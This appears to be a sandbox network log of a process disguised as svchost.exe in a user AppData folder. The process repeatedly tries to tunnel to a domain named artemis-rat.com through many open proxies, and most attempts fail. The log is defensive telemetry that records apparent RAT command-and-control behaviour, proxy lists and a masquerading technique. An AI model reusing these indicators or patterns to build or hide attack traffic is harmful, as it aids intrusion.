Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3202	192.168.2.5	60178	193.84.89.202	8443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.593178988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.270900965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177875996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3203	192.168.2.5	60254	147.75.92.251	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.602927923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.877989054 CET	356	IN	HTTP/1.0 502 Bad Gateway Server: Zscaler/6.3 Content-Type: text/html Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3204	192.168.2.5	60181	219.243.212.118	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.615148067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.943542004 CET	22	IN	HTTP/1.1 502 ERROR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3205	192.168.2.5	60247	13.37.89.201	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.622951984 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.920686960 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:34 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3206	192.168.2.5	60281	51.158.122.48	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.623097897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.270956993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177876949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3207	192.168.2.5	60230	8.217.44.229	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.626339912 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3208	192.168.2.5	60236	172.104.251.179	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.626828909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.928423882 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3209	192.168.2.5	60177	82.137.244.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.643426895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3210	192.168.2.5	60245	185.38.111.1	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.647227049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.972780943 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Length: 0
Mar 9, 2024 13:14:35.330100060 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3211	192.168.2.5	60308	185.103.101.39	10051	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.659142971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3212	192.168.2.5	60249	221.224.44.91	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.660265923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3213	192.168.2.5	60290	43.155.170.35	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.665611029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3214	192.168.2.5	60204	178.128.82.105	33225	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.667243958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.380319118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.474508047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.677418947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3215	192.168.2.5	60162	5.44.42.115	58386	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.750091076 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3216	192.168.2.5	60330	142.54.232.6	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.750149965 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3217	192.168.2.5	60323	23.137.248.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.750212908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3218	192.168.2.5	58874	50.63.12.101	6095	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.750258923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3219	192.168.2.5	60214	47.91.104.88	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.750802040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.163369894 CET	214	IN	HTTP/1.1 503 Service Unavailable content-length: 107 cache-control: no-cache content-type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3220	192.168.2.5	60376	172.67.181.9	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.752809048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.906939030 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3221	192.168.2.5	60380	104.19.109.209	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.754446983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.908891916 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3222	192.168.2.5	60324	119.23.148.173	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.756660938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.377120018 CET	59	IN	HTTP/1.1 200 Connection Established Proxy-agent: nginx
Mar 9, 2024 13:14:35.378061056 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 aa 28 ed 75 6c 1a 2a cf 36 35 6e b6 f5 d4 76 b4 08 f5 d8 ef aa 79 70 a7 59 15 67 b0 b5 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR(ul65nvypYg,+0/$#('=<5/Uartemis-rat.com#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3223	192.168.2.5	60356	45.191.75.186	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.768496990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.512680054 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3224	192.168.2.5	60378	137.184.15.145	8000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.772756100 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3225	192.168.2.5	60329	8.210.80.191	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.774374008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3226	192.168.2.5	59997	192.111.137.35	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.778980970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3227	192.168.2.5	59401	64.56.150.102	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.786406040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.038182020 CET	1254	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.28 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:34 GMT Content-Type: text/html;charset=utf-8 Content-Length: 952 X-Squid-Error: ERR_ACCESS_DENIED 0 Content-Language: en X-Cache: MISS from ah_test Via: 1.1 ah_test (squid/3.5.28) Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53 61 74 2c 20 30 39 20 4d 61 72 20 32 30 32 34 20 31 32 3a 31 34 3a 33 34 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/">https://artemis-rat.com/</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Sat, 09 Mar 2024 12:14:34 GMT</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3228	192.168.2.5	60383	51.81.186.179	51405	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:34.794940948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.380182981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
